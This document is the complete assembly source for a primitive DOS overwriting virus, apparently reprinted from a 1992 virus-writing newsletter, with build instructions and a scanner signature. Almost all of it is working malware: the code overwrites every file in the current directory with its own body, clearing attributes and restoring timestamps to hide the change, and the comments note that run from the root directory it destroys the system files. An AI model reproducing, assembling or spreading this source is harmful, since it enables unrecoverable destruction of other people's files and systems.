;Popoolar Science virus - a very simple overwriting infector ;published in Crypt Newsletter 11, Dec. 1992. Edited by Urnst Kouch ; ;Popoolar Science is an indiscriminate, primitive over-writing ;virus which will attack all files in the current directory. ;Data overwritten by the virus is unrecoverable. Programs overwritten ;by Popoolar Science are infectious if their size does not exceed the ;64k boundary for .COM programs. .EXE's larger than this will not ;spread the virus; DOS will issue an "out of memory" message when the ;ruined program is loaded. Ruined programs of any type can only be erased ;from the disk to curb infection. ; ;If Popoolar Science is called into the root directory, the system files ;will be destroyed, resulting in a machine hang on start-up. ; ;Popoolar Science does not look for a ident-marker in infected files - it ;merely overwrites all files in the current directory repeatedly. Indeed, ;there seems no need for a self-recognition routine in such a simple ;program of limited aims. ; ; ;Popoolar Science will assemble directly to a .COMfile using Isaacson's ;A86 assembler. Use of a MASM/TASM compatible assembler will require ;addition of a set of declarative statements. ; ;Virus signature suitable for loading into VIRSCAN.DAT files of TBScan, ;McAfee's SCAN and/or F-PROT 2.0x: ;[POP] ;DE B8 01 43 33 C9 8D 54 1E CD 21 B8 02 3D CD 21 nosewheel: jmp virubegin ; get going virubegin: push cs pop ds mov dx,offset msg mov ah,09h ; Display subscription int 21h ; endorsement for Popular ; Science magazine. mov dx,offset file_mask ; load filemask for "*.*" call find_n_infect ; infect a file, no need for ; an error routine - if no ; files found, virus will ; rewrite itself. mov ax,04C00h ; exit to DOS int 021h find_n_infect: push bp mov ah,02Fh ; get DTA int 021h push bx ; Save old DTA mov bp,sp ; BP points to local buffer sub sp,128 ; Allocate 128 bytes on stack push dx ; Save filemask mov ah,01Ah ; DOS set DTA function lea dx,[bp - 128] ; DX points to buffer int 021h mov ah,04Eh ; search for first host file mov cx,00100111b ; CX holds all attributes pop dx ; Restore file mask findfilez: int 021h jc reset ; reset DTA and get ready to exit call write2file ; Infect file! mov ah,04Fh jmp short findfilez ; find another host file reset: mov sp,bp mov ah,01Ah pop dx ; Retrieve old DTA address int 021h pop bp ret write2file: ; subroutine, writes virus over beginning of all files mov ah,02Fh ; DOS get DTA address function int 021h mov si,bx mov ax,04301h ; set file attributes xor cx,cx lea dx,[si + 01Eh] ; DX points to target handle int 021h mov ax,03D02h ; open file, read/write int 021h ; do it! xchg bx,ax ; put handle in BX mov ah,040h ; write to file, start at beginning mov cx,tailhook - nosewheel ; CX = virus length mov dx,offset nosewheel ; DX points to start of virus int 021h ; do it now! mov ax,05701h mov cx,[si + 016h] ; CX holds old file time mov dx,[si + 018h] ; DX holds old file date int 021h ; restore them mov ah,3Eh ; close file int 021h exit: ; exit, dummeh! ret file_mask db "*.*",0 ; Filemask for all files msg db 'PopooLar ScIencE RoolZ!$' ;Popular Science mag message tailhook: